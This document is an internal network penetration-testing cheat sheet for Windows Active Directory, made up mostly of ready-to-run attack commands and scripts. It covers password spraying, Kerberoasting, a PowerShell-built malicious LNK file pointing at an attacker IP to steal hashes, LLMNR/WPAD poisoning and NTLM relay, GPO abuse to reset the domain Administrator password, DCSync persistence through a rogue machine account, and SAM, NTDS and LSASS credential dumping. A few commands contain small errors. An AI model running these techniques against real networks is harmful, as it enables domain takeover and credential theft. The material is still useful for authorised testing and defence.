Internal Network Penetration Testing

Recon

Unauthenticated enumeration

whoami
systeminfo
hostname
whoami /priv
net users
net localgroup
findstr /spin "password"*.*
nslookup .
gpresult /R
set
echo %envar% (CMD)
$env:envar (PowerShell)
Get-WmiObject Win32_ComputerSystem
klist
klist tgt

PowerShelll port scan

PS C:\Users\lutzenfried> 0..65535 | % {echo ((New-object Net.Sockets.TcpClient).Connect("192.168.2.155",$_)) "Port $_ is open!"} 2> $null```

AD search GUI Copy dsquery.dll from C:\Windows\System32

rundll32 dsquery.dll,OpenqueryWindow

Unauthenticated User enumeration

Finding DC IP

nmcli dev show eth0

nslookup -type=SRV _ldap._tcp.dc._msdcs.<domainName>
nslookup -type=SRV _ldap._tcp.dc._msdcs.company.local

User enumeration via Kerberos

--> Require list of possible usernames:
- Non-existent account : KDC_ERR_C_PRINCIPAL_UNKNOWN - A locked or disabled account : KDC_ERR_CLIENT_REVOKED - A valid account : KDC_ERR_PREAUTH_REQUIRED

User enumeration without kerberos

Use the DsrGetDcNameEx2,CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.
- https://github.com/sensepost/UserEnum - https://sensepost.com/blog/2018/a-new-look-at-null-sessions-and-user-enumeration/

First foothold

NAC Bypass (802.1x)

NAC (Network Access Control) acts as a kind of a gatekeeper to the local network infrastructure. Its usually works with whitelists, blacklists, authentication requirements or host scanning to restrict access and keep unwanted devices out of the network.

NAC can be setup using multiple measures: - Filtering of MAC addresses - Authentication with username & password - Authentication with certificates - Fingerprinting - Host checks

802.1x EAP-TLS

802.1x EAP-PEAP

Misc techniques

Sometimes trying different mac address such as MacOS device, Switch/Routers, Vmware VM can give you access or redirect you to specific VLAN without restriction. - VMWARE VM : 00-0C-29-00-4B-3F - Apple : F8:FF:C2:23:32:43

Username == password

Using crackmapexec to test for password equal to username on domain contoso.com

for word in $(cat users.txt); do crackmapexec smb 10.10.0.10 -u $word -p $word -d contoso.com; done

SMB enumeration

SMB Version 1

crackmapexec smb all_ips.txt | grep -a "SMBv1:True" | cut -d " " -f 10

SMB Signing

crackmapexec smb all_ips.txt | grep -a "signing:False" | cut -d " " -f 10

Unsupported operating systems

crackmapexec smb all_ips.txt |  egrep -a "Windows 6.1|Server 2008|Server 2003|Windows 7|Server \(R\) 2008"

Checking NLA and other RDP issue

rdp-sec-check is a Perl script to enumerate the different security settings of an remote destktop service (AKA Terminal Services) - https://github.com/CiscoCXSecurity/rdp-sec-check

sudo cpan
cpan[1]> install Encoding::BER
rdp-sec-check.pl 10.0.0.93

RPC / SMB null enumeration

rpcclient -U '' -N 10.10.0.10 -c "querygroupmem 0x200" |  cut -d '[' -f 2 | cut -d ']' -f 1

AS-Rep Roasting

When a TGT request is made, the user must, by default, authenticate to the KDC in order for it to respond. Sometimes, this prior authentication is not requested for some accounts, allowing an attacker to abuse this configuration.

This configuration allows retrieving TGT encrypted with user's credential for users that have Do not require Kerberos preauthentication property selected:

Google Project Zero undercover some issue with RC4 and Kerberos authentication.
If a user have Do not require Kerberos preauthentication property there is no more the need to crack the encrypted TGT.

python3 CVE-2022-33679.py evilcorp.local/vulnasrepuser dc-2016.evilcorp.local -dc-ip 192.168.2.60
export KRB5CCNAME=vulnasrepuser_dc-2016.evilcorp.local.ccache 
crackmapexec smb dc-2016.evilcorp.local -k

Authenticated enumeration

nltest /domain_trusts
nltest /trusted_domains
nltest /primary
nltest /sc_query:<domain>
nltest /dclist:<domain>
nltest /dsgetsite
nltest /whowill:<domain> <user>

Domain policy using PowerView

Get-DomainPolicy
(Get-DomainPolicy)."System Access"

Getting password policy

Get domain password policy using ActiveDirectory module. (RSAT)

Get-WindowsCapability -Name RSAT* -Online | Select-Object -Property DisplayName, State
Get-ADDefaultDomainPasswordPolicy

Get all domain fined grained password policy

Get-ADFinedGrainedPasswordPolicy -Filter *

Get password policy for specific user

Get-ADUserResultantPasswordPolicy -Identity john.doe

MISC Enumeration commands

Recursive search for Domain Admins members

dsquery group -name "Domain Admins" | dsget group -expand -members

Get Net session

Get-NetComputer | Get-NetSession

Review SMB Share rights

Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -Credentials domain\user

Active Directory user and computer account description

Using crackmapexec to get active directory user description

crackmapexec ldap 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M get-desc-users

--> It is also extremely important to check for computer account description, as computer account are just AD object with description attribute.

Resetting expired passwords remotely

PASSWD_NOT_REQD

If PASSWD_NOTREQD user-Account-Control Attribute Value bit is set then No password is required.

1) First collect the information from the domain controller:

python ldapdomaindump.py -u example.com\\john -p pass123 -d ';' 10.100.20.1

2) Once the dumping is done, get the list of users with the PASSWD_NOTREQD flag using the following command:

grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'

Reset password of users who have PASSWD_NOTREQD flag set and have never set a password:

Get-ADUser -Filter "useraccountcontrol -band 32" -Properties PasswordLastSet | Where-Object { $_.PasswordLastSet -eq $null } | select SamAccountName,Name,distinguishedname | Out-GridView

Machine Account Quota

Identify machine account quota domain attribute:

crackmapexec ldap 192.168.0.10 -u jdoe -H XXXXXX:XXXXXXX -M MAQ --kdcHost corp.company.local

Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

LAPS / LAPS bypass

Retrieving LAPS passwords using Crackmapexec

crackmapexec ldap 192.168.0.10 -u jdoe -H XXXXX:XXXXX -M laps --kdcHost corp.company.local

Admin Count

crackmapexec ldap company.com -u 'jdoe' -p 'Pass1234' -d company.com --admin-count

Checking GPP passwords

Using Impackets Get-GPPPassword.py

python3 Get-GPPPassword.py company.com/jdoe:Pass1234@10.10.0.10

Using Metasploit module

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.0.10
msf auxiliary(smb_enum_gpp) > set smbuser jdoe
msf auxiliary(smb_enum_gpp) > set smbpass Pass1234
msf auxiliary(smb_enum_gpp) > exploit

Checking GPP autologin

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M gpp_autologin

Checking share

Checking share access rights with domain user

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com --shares

Complete review of network share permissions.
--> Powerhuntshare can be run from domain or non domain joined machine.

Running Powerhuntshare from domain joined machine.

Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test

Checking if print spooler service is enable using impacket RPCDUMP or crackmapexec (used RPCDUMP but can be used to scan on large range)

python3 rpcdump.py company.com/jdoe:Pass1234@10.10.0.10 | grep 'MS-RPRN\|MS-PAR'
crackmapexec smb rangeIP.txt -u jdoe -p Pass1234 -d company.com -M spooler | grep Spooler

Local admin brute force

Pywerview recon tool

PowerView's functionalities in Python, using the wonderful impacket library. - https://github.com/the-useless-one/pywerview

python pywerview.py get-netuser -w company.local -u jdoe --dc-ip 192.168.0.10 --username jdoe

Recon/Enumeration using BloodHound

. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

Expanding BloodHound

Exploitation

Identifying Quick Wins

nmap -p 8080,1098,1099,1050,8000,8888,8008,37471,40259,9010,7001 -iL ips.txt -oN tomcat_rmi_jboss.txt -sV

adPeas

Password spray

Spraying 3 password attempt for each user every 15 minutes without attempting password=username

spray.sh -smb 192.168.0.10 users.txt seasons.txt 3 15 corp.company.local NOUSERUSER

Force Authentication

.SCF, .URL, .RTF, .XML,

LNK Files

If you get access to a share we can create a malicious .LNK file. This .LNK file will includes a refernece to the attacker computers. You can after choose to Relay the NetNTLM hash or crack it.

Using PowerShell

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\Malicious.lnk")
$lnk.TargetPath = "\\<attackerIP>\@file.txt"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "LNK file"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Potatoes Attacks

Ghost potato

https://shenaniganslabs.io/files/impacket-ghostpotato.zip

Remote Potato

https://github.com/antonioCoco/RemotePotato0/

Juicy Potato

https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505

Hot Potato

https://pentestlab.blog/2017/04/13/hot-potato/

Sweet Potato

https://www.pentestpartners.com/security-blog/sweetpotato-service-to-system/

https://www.ctfnote.com/red-teaming/privilege-escalation/windows-privilege-escalation/token-impersonation-and-potato-attacks

God Potato

https://github.com/BeichenDream/GodPotato

RPC Misc

AD user password modification using rpcclient
user@host # rpcclient -U supportAccount //192.168.0.100
[...] authenticate using the supportAccount password which needs to be modified
rpcclient $> setuserinfo2 supportAccount 23 SuperNewPassword22

--> Note : If package passing-the-hash is installed on attacker machine, you can even do this with just a NTLM hash. (Flag : --pw-nt-hash)

RPC password spraying
while read x; do echo $x; rpcclient -U “DOMAIN/$x%PasswOrd123” -c “getusername;quit” 192.168.0.110; done < ./userlist.txt

Using bash script:
#/bin/bash
for u in 'cat dom_users.txt'
do echo -n "[*] user: $u" && rpcclient -U "$u%password" -c "getusername;quit" 10.10.10.192
done

Kerberoasting

Service Principal Names (SPN's) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service).

The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts.

GetUserSPNs.py -request -dc-ip 192.168.1.10 COMPANY.LOCAL/jdoe:PasswordJdoe123 -outputfile hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt

--> To protect against this attack, we must avoid having SPN on user accounts, in favor of machine accounts.
--> If it is necessary, we should use Microsoft’s Managed Service Accounts (MSA) feature, ensuring that the account password is robust and changed regularly and automatically

Kerberos Delegation

Kerberos Bronze Bit

https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-overview/ https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-theory/ https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-attack/

Abusing Vulnerable GPO

\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN\<USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION"

Abusing MS-SQL Service

. ./PowerUPSQL.ps1
Get-SQLInstanceLocal -Verbose
(Get-SQLServerLinkCrawl -Verbose -Instance "10.10.10.20" -Query 'select * from master..sysservers').customquery 

Import-Module .\powercat.ps1 powercat -l -v -p 443 -t 10000

Relay attacks

NetNTLMv1 Downgrade attack

Stealing NetNTLM hashes via outlook signatures

Drop the MIC CVE-2019-1040

Exploiting ACL over GPO

Insecure LDAP: LDAPS / Signing / Channel Binding

Insecure LDAP traffic can exposed clients to multiple vulnerabilities and exploitation path such as: - Unencrypted LDAP (LDAPS) : Credential and authentication interception (port TCP-UDP/389) - LDAP Signing disable : LDAP Relay attack (such as SMB Relay but using LDAP) - LDAP Channel Binding :

LDAPS

Domain controllers and clients are in constant exchange and use the LDAP protocol, which communicates via port 389 (TCP and UDP).

In case a customer use LDAP (389) instead of LDAPS (636) you will be able to intercept authentication and credentials.

Why LDAPS is not deployed everywhere: - Not all devices are compatible with it (Old telephone systems or legacy applications) - Small

Note: If SSL is used you can try to make MITM offering a false certificate, if the user accepts it, you are able to Downgrade the authentication method and see the credentials again.

LDAP Signing disable

LDAP signing adds a digital signature to the connection. It ensures the authenticity and integrity of the transmitted data. This means that the recipient can verify the sender and determine whether the data has been manipulated along the way.

In case LDAP signing is not enable it is possible to relay a valid LDAP session using ntlmrelayx for example. The LDAP relay attack will give you the ability to perform multiple action such as :

Validate LDAP signing is not enforced

crackmapexec ldap domain_controllers.txt -u jdoe -p Password123 -M ldap-signing

LDAP Channel Binding

Channel binding is the act of binding the transport layer and application layer together. In the case of LDAP channel binding, the TLS tunnel and the LDAP application layer are being tied together. When these two layers are tied together it creates a unique fingerprint for the LDAP communication. Any interception of the LDAP communications cannot be re-used as this would require establishing a new TLS tunnel which would invalidate the LDAP communication’s unique fingerprint.

python3 LdapRelayScan.py -dc-ip 192.168.0.10 -u jdoe -p Password123

Unencrypted Protocols in use

SMTP

Port 25

HTTP

Port 80

Telnet

Port 23

FTP

Port 21

LDAP

LDAPS uses its own distinct network port to connect clients and servers. The default port for LDAP is port 389, but LDAPS uses port 636 and establishes TLS/SSL upon connecting with a client.

SYSVOL / GPP

From Windows client perspective

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

The PowerSploit function Get-GPPPassword is most useful for Group Policy Preference exploitation.
- Get-GPPPassword.ps1

From Linux client

Metasploit Module
use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit
Metasploit Post-Module : Once you get shell on windows host
use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit
CrackMapExec Module 1 : gpp_password

Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. Groups.xml, Services.xml, Scheduledtasks.xml, DataSources.xml, Printers.xml, Drives.xml

crackmapexec smb 192.168.0.10 -u jdoe -p Password 123 -M gpp_pasword

CrackMapExec Module 2: gpp_autologin

Searches the domain controller for registry.xml to find autologon information and returns the username and password.

crackmapexec smb 192.168.0.10 -u jdoe -p Password 123 -M gpp_autologin

Impacket Module

Breadth-first search algorithm to recursively find .xml extension files within SYSVOL.

Get-GPPPassword.py company.local/jdoe:Password123@192.168.0.10'

Decrypt the found password manually
gpp-decrypt <encrypted cpassword>

LLMNR / NBT-NS / mDNS

Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network.

Responder + ntlmrelayx

It is possible to directly relay NetNTLM has to SMB/LDAP/HTTP and DNS session over a victim. If the victim has SMB and/or LDAP signing activated try to relay on other protocols than SMB or LDAP.

Poisoning LLMNR/NetBios-NS response

python3 Responder.py -I eth0 -wbF

Relay over smb to 192.168.0.10, with smb2 support, socks enable, interactive mode and dumping the NetNTLM relayed hash in option

sudo ntlmrelayx.py -t 192.168.0.10 -i -socks -smb2support -debug --output-file ./netntlm.hashes.relay

WPAD

Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from the network, download the wpad.dat, Proxy Auto-Config (PAC) file.

A WPAD server provides client proxy settings via a particular URL: - http://wpad.example.org/wpad.dat

--> When a machine has these protocols enabled, if the local network DNS is not able to resolve the name, the machine will ask to all hosts of the network.

Using Responder we can poison DNS, DHCP, LLMNR and NBT-NS traffic to redirect clients to a malicious WPAD Server.

responder -I eth0 -wFb

--> Backdooring using Responder and WPAD attack Modify Responder configuration file

; Set to On to serve the custom HTML if the URL does not contain .exe
; Set to Off to inject the 'HTMLToInject' in web pages instead
Serve-Html = On

--> Create a specific web page for error or use the default one.

--> Create an implant to be downloaded by the client. By default the error message indicate this URL : http://isaProxysrv/ProxyClient.exe

--> Patch by Microsoft (MS16-077): Location of WPAD file is no longer requested via broadcast protocols bnut only via DNS.

ACL / DACL Exploitation

BloodyAD - AutoBloody
DACL Edit python script
ForceChangePassword

Returns the ACLs associated with jdoe user in DOMAIN.local domain and resolve GUIDs to their display names

Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "DOMAIN.local\jdoe"}

. .\PowerView.ps1
Set-DomainUserPassword -Identity User -Verbose

Using rpcclient

rpcclient -U jdoe 10.10.10.192
setuserinfo2 victimUser 23 'Pass123!'

MachineAccountQuota (MAQ)

Various tools exist which can create a machine account from the command line or from an implant such as StandIn, SharpMad and PowerMad.

Protected Users

Well-known SID/RID: S-1-5-21-<domain>-525

This group was introduced in Windows Server 2012 R2 domain controllers.

Get-ADGroupMember -Identity "Protected Users"
for group in $(rpcclient -U '' -N 10.10.0.10 -c enumdomgroups | grep Protected | cut -d '[' -f 3 | cut -d ']' -f 1); do rpcclient -U '' -N 10.10.0.10 -c "querygroupmem $group"; done

Protected users is a Security Group which aims to create additional protection against compromise of credential regarding its members, such as the followings:
- Kerberos protocol will not use the weaker DES or RC4 encryption types in the preauthentication process - Credential delegation (CredSSP) will not cache the user's plain text credentials - Windows Digest will not cache the user's plain text credentials even when Windows Digest is enabled (From windows 8.1 and Server 2012 R2) - The user’s account cannot be delegated with Kerberos constrained or unconstrained delegation - Members of this group cannot use NTLM - Kerberos ticket-granting tickets (TGTs) lifetime = 4 hours

--> Restriction of the Protected Users group is not complete when it comes to the RID500 user of the Active Directory domain. We cannot connect using the NTLM authentication protocol but we can connect using the Kerberos authentication protocol with RC4.

PAC

Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

ProxyLogon

ProxyShell

ProxyNotShell

ZeroLogon

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M zerologon

PrintNightmare

SpoolSample

https://github.com/leechristensen/SpoolSample

ShadowCoerce

https://github.com/ShutdownRepo/ShadowCoerce

DFSCoerce

https://github.com/Wh04m1001/DFSCoerce

MultiCoerce

Petitpotam

PetitPotam, publicly disclosed by French security researcher Lionel Gilles, is comparable to the PrintSpooler bug but utilizes the MS-EFSRPC API to coerce authentication rather than MS-RPRN.

Check to validate host is vulnerable to petitpotam

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M petitpotam

samAccountName spoofing

MiTM - IPv6 + Relay

SMB Relay

LDAP Relay

Tools: ntlmrelayx, multirelay

Responder + Relay

SMB Relay

LDAP Relay

WSUS Exploitation

In case of WSUS being deployed without SSL/TLS encrypted communications, we can perform a man-in-the-middle attack and inject a fake update. - Can only deliver binaries signed by Microsoft (PSExec, BGinfo with VB script) - Need to perform ARP Spoofing or tamper with the system's proxy settings (if possible)

--> WSUS Server can be found based on the server hostname (e.g. server-wsus-01) or based on open ports (8530,8531)

Tools
- https://github.com/pimps/wsuxploit - https://github.com/GoSecure/pywsus - https://github.com/ctxis/wsuspect-proxy/

python pywsus.py -H 172.16.205.21 -p 8530 -e PsExec64.exe -c ‘/accepteula /s cmd.exe /c “echo wsus.poc > C:\\poc.txt”‘

Windows Update is a Windows service, wuauclt.exe which run periodically to check for updates.
Registry keys exist that govern various details such: - Update server's location - Update frequency - Privileged Escalation of unprivileged users

--> Communication: Client --> Windows Update Server : HTTP(S) / SOAP XML web service.

WSUS details

WSUS or Windows Software Update Services is the enterprise variant of Windows update.
- Updates fetched from local server instead of Microsoft Server - Updates must be approved by administrator before being pushed out

wsus soap service

MITM wsus soap service

Check WSUS HTTP Misconfiguration: - Check Registry on WSUS client machines to validate TLS usage

HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\
WUServer = http://wsus-server.local:8530

LDAP Pass Back

LDAP pass back attack target LDAP credentials used by the MFP within its network configuration (check for default credentials on printers).

The attacker tricks a device to connect to a rogue server to disclose the stored network credentials or hashes while the device trying to authenticate to the server.

2 methods: 1. nc listener 2. Rogue LDAP server

Sometimes the domain account used within theses printers are service accounts with interesting privileges and I also found domain admins account credentials being used. In any case if a domain account is used it can give you a first foothold within the domain from an unauthenticated perspective.

SMTP Pass Back

Kerberos attacks

AS-Rep Roasting

Kerberoasting

Timeroasting / TrustRoasting / Computer Spraying

Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account's RID. This is not a problem when computer accounts are properly generated, but if a non-standard or legacy default password is set this tool allows you to brute-force those offline.

On domain controller (up to Windows Server 2019) if you create a computer account (Workstation1$) with CMD Line (net computer) or through the GUI box and check Assign this computer account as a pre-Windows 2000 Computer.

--> This will set the computer account password to default password that matches the first 14 characters of their computer name, lowercase and without a dollar sign.

python3 timeroast.py 192.168.2.60 -o ntp_hashes

1002:$sntp-ms$3axxxxxxx3$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx038
1116:$sntp-ms$11xxxxxxx2$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx73e
1119:$sntp-ms$e9xxxxxxxb$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxcfa
1117:$sntp-ms$30xxxxxxx5$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx2d3
1127:$sntp-ms$71xxxxxxx7$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx663
1128:$sntp-ms$51xxxxxxxd$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx9f6
1129:$sntp-ms$08xxxxxxxf$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxdd4
1131:$sntp-ms$d5xxxxxxxc$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx41e
1137:$sntp-ms$13xxxxxxxe$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxb80
1138:$sntp-ms$9exxxxxxx0$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx767
1139:$sntp-ms$bbxxxxxxxc$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxea2
1140:$sntp-ms$9axxxxxxx5$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxe01

Cracking NTP Hashes - https://github.com/hashcat/hashcat/issues/3629 - https://github.com/hashcat/hashcat/commit/5446570a4fe7fbadc0bb481f41616e76833da735

Format 31300 (SNTP-MS) available to hashcat to crack the NTP hashes.

hashcat -a 0 -m 3130 ntp_hashes ./wordlists/rockyou.txt

MS14-066

Active Directory exploitation

ZeroLogon

Shadow Credential

If an attacker can write to the msDS-KeyCredentialLink property of a user/computer, it is possible to retrieve the NT hash of that object.

ShadowSpray

Exploiting ADCS

Find PKI Enrollment Services in Active Directory and Certificate Templates Names

crackmapexec ldap 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M adcs
certutil.exe -config - -ping

ESC1 -

ADCS WebDav + NTLM relay to LDAP

Adidns

The Domain Services ACL can be hardened to prevent domain users from creating arbitrary records. This can be done by changing the security configuration for your DNS zones. On the server on which the service Domain Service is running, open the DNS Manager, and for each domain zone under which users are joined, remove the “Create all child objects” permission from the “Authenticated Users” group.

Exploiting machine accounts (WS01$)

Every computer joined to Active Directory (AD) has an associated computer account in AD. A computer account in AD is a security principal (same as user accounts and security groups) and as such has a number of attributes that are the same as those found on user accounts including a Security IDentifier (SID), memberOf, lastlogondate, passwordlastset, etc.

Get-ADComputer -Filter * -Properties MemberOf | ? {$_.MemberOf}
net group "domain admins" /domain

Converting machine account Hex value to NTLM hash:

import hashlib,binascii hexpass = "e6 5f 92..."
hexpass = hexpass.replace(" ","")
passwd = hexpass.decode("hex")
hash = hashlib.new('md4', passwd).digest()
print binascii.hexlify(hash)

Over-Pass-The-hash

Use the user or computer NTLM hash to request Kerberos tickets. --> Alternative to Pass The hash over NTLM protocol
--> Useful in networks where NTLM protocol is disabled and only Kerberos is allowed.

getTGT.py domain.local/workstation1$ -hashes XXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXX -dc-ip 192.168.0.10 -debug
KRB5CCNAME=/home/test/lutzenfried/tooling/workstation1\$.ccache
Potential error when using Over Pass The Hash attack due to the Kerberos and time.
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
--> Error raised because of your local time, you need to synchronise the host with the DC: ntpdate <IP of DC>

Pass The ticket

Silver ticket

Kerberos Delegation

Check for system trusted for delegation

crackmapexec ldap 192.168.0.10 -u jdoe -p Password123 --trusted-for-delegation
OR
ldapdomaindump -u "company.local\\jdoe" -p "Password123" 192.168.0.10  
grep TRUSTED_FOR_DELEGATION domain_computers.grep
OR
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}

Exploiting RBCD : MachineAccountQuota

Exploiting RBCD : WRITE Priv

From On-Premise to Azure

Domain Trust

Forest Trust

Lateral movement

smbclient authentication using NTLM hash

smbclient //192.168.0.10/C$ -U corp.company.com/jdoe --pw-nt-hash <NT hash>

wmiexec

Detection

smbexec

Detection

psexec

Detection

atexec

Detection

comexec

Detection

Persistence

AdminSDHolder

Primary Group ID

The primary group id is a a user object attribute and contains relative identifier (RID) for the primary group of the user.
--> By default this is the RID for the Domain Users group (RID 513).

By using the Primary Group ID attribute and a specific Access Control Entry (ACE), an attacker can hide the membership of one group that he is already a member of without having any permissions on the group.

This cool trick cannot work on members of protected groups such as Domain Admins, but can work on members of normal groups such as DnsAdmins, which can be used to escalate to Domain Admins.

Dropping SPN on admin accounts

https://adsecurity.org/?p=3466

Persistence in AD environment

Machine/Computer accounts

Machine accounts could be used as a backdoor for domain persistence by adding them to high privilege groups.

net group "Domain Admins" newMachine01$ /add /domain
python3 secretsdump.py company.local/newMachine01\$:Password123@10.0.0.1 -just-dc-user krbtgt

Machine/Computer accounts 2

Even though that dumping passwords hashes via the DCSync technique is not new and SOC teams might have proper alerting in place, using a computer account to perform the same technique might be a more stealthier approach.

Modification of the “userAccountControl” attribute can transform a computer account to a domain controller.

Computer account to appear as a domain controller: - userAccountControl attribute needs to have the value of 0x2000 = ( SERVER_TRUST_ACCOUNT ) decimal : 8192 --> Modification of this attribute requires domain administrator level privileges

Import-Module .\Powermad.psm1
New-MachineAccount -MachineAccount newMachine01 -Domain company.local -DomainController dc01.company.local
By default new computer will have primary group ID 515 (RID for domain groups and represents that this is a domain computer)

If you can modify the userAccountControl an therefore change the primary group ID. This attribute would be modified to have a value of 8192 the primary group id will change to 516 which belongs to domain controllers.

Set-ADComputer newMachine01 -replace @{ "userAccountcontrol" = 8192 }

Most important bit of having a computer account to act as a domain controller is that the DCSync can be used on that arbitrary account instead of the legitimate domain controller.

Steps: 1. Creation a machine account 2. Modifying userAccountControl to 8192 3. Computer account is known its NTLM hash could be used to pass the hash (create new cmd.exe, mimikatz...) 4. Command prompt will open under the context of the machine account --> DCSync KRBTG or whole identities

lsadump::dcsync /domain:purple.lab /user:krbtgt
Automate technique 1: - https://github.com/STEALTHbits/ServerUntrustAccount
Add-ServerUntrustAccount -ComputerName "newMachine01" -Password "Password123" -Verbose
Invoke-ServerUntrustAccount -ComputerName "newMachine01" -Password "Password123" -MimikatzPath ".\mimikatz.exe"

Automate technique 2: PowerShell script to automate domain persistence via the userAccountControl active directory attribute.

function Execute-userAccountControl
{
[CmdletBinding()]
        param
        (
                [System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
                [System.String]$ComputerName = 'Pentestlab',
                [System.String]$OSVersion = '10.0 (18363)',
                [System.String]$OS = 'Windows 10 Enterprise',
                [System.String]$DNSName = "$ComputerName.$DomainFQDN",
$MachineAccount = 'Pentestlab'
        )
$secureString = convertto-securestring "Password123" -asplaintext -force
$VerbosePreference = "Continue"

Write-Verbose -Message "Creating Computer Account: $ComputerName"
New-ADComputer $ComputerName -AccountPassword $securestring -Enabled $true -OperatingSystem $OS -OperatingSystemVersion $OS_Version -DNSHostName
$DNSName -ErrorAction Stop;
Write-Verbose -Message "$ComputerName created!"
Write-Verbose -Message "Attempting to establish persistence."
Write-Verbose -Message "Changing the userAccountControl attribute of $MachineAccount computer to 8192."
Set-ADComputer $MachineAccount -replace @{ "userAccountcontrol" = 8192 };
Write-Verbose -Message "$MachineAccount is now a Domain Controller!"
Write-Verbose -Message "Domain persistence established!You can now use the DCSync technique with Pentestlab credentials."
$VerbosePreference = "Continue"
}

Post-Exploitation

Computer accounts privesc

For example, if an admin server is joined to a group with backup rights on Domain Controllers, all an attacker needs to do is compromise an admin account with rights to that admin server and then get System rights on that admin server to compromise the domain.

  1. Compromise an account with admin rights to admin server.
  2. Admin server computer account needs rights to Domain Controllers.

Extract NTDS

Extract NTDS without Admin priv

Multiple ways to extract NTDS

Active Directory NTDS : Clear Text passwords (Reversible encryption)

Sometimes when using secretsdump.py to extract NTDS.dit you will encounter some CLEARTEXT credential wihtin the dump.

Cleartext does not really mean that the passwords are stored as is. They are stored in an encrypted form using RC4 encryption.

The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin.This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”.

List users with "Store passwords using reversible encryption" enabled

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
--> list of user account control flag :
- https://docs.microsoft.com/en-us/windows/win32/adschema/a-useraccountcontrol - http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm

DCSYNC

Accessing LSASS secrets

Windows Secrets Extraction - Summary - Secrets in LSASS process. - Secrets in registry such as LSA secrets. - DPAPI secrets.

LSASS

Secrets retrieved From LSASS - User / Machine$ (computer account) Hashes - Cleartest credentials (If Wdigest enabled) - Kerberos ticket (TGT and ST) - DPAPI cached keys

Protection - RunAsPPL - Credential Guards

UserLand - Lsassy --> Pypykatz - Nanodump

KernelLand - https://www.loldrivers.io/ - Physmem2profit - EdrSandBlast - DumpIt

Registry Secrets

Secrets retrieved From registry - SAM secrets (security Account Manager) - LSA secrets (Local Security Authority) - DPAPI_SYSTEM - NL$KM - MsCache - $MACHINE.ACC - DEFAUTLPASSWORD - Software Secrets (ASP.NET, ...)

> reg save HKLM\SAM sam
OR
> vssadmin create shadow /for=C:
> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM SAM
OR
$ secretsdump.py -sam sam -security security -system system local

SharpSecretsDump : C# project used to mimic secretsdump.py from Impacket

DPAPI

